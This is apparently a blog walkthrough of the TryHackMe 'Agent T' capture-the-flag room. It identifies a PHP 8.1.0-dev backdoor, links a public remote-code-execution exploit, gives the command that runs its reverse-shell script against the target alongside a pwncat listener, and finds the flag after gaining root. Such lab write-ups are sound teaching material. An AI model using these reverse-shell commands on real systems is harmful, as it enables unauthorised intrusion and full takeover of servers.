THM - Agent T

THM - Agent T

Hi everyone,

today we see Agent T room Created by JohnHammond!

WE START!

Let's open the web page right away:

We take a look at the code but nothing interesting.

Let's look at the hint:

Ok let's look at the header

Great, php 8.1-dev a quick google check, and lo and behold, PHP 8.1.0-dev Backdoor Remote Code Execution:

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

We download the file revshell_php_8.1.0-dev.py

A quick read of the instructions:

And we prepare the terminal, On the first terminal we send the command:

python revshell_php_8.1.0-dev.py http://<machine ip>/ myIP 4444

on the second teminal I use

pwncat-cs -lp 4444

BINGO, we are already Root!

we look for the flag in the /root folder:


but nothing..

mmm, we look for the flag with the command:

find / -iname *flag*

VoilĂ 

Also enjoy the video on YouTube and leave a like and subscribe to the channel to support me!

Thank you John and THM!

Related posts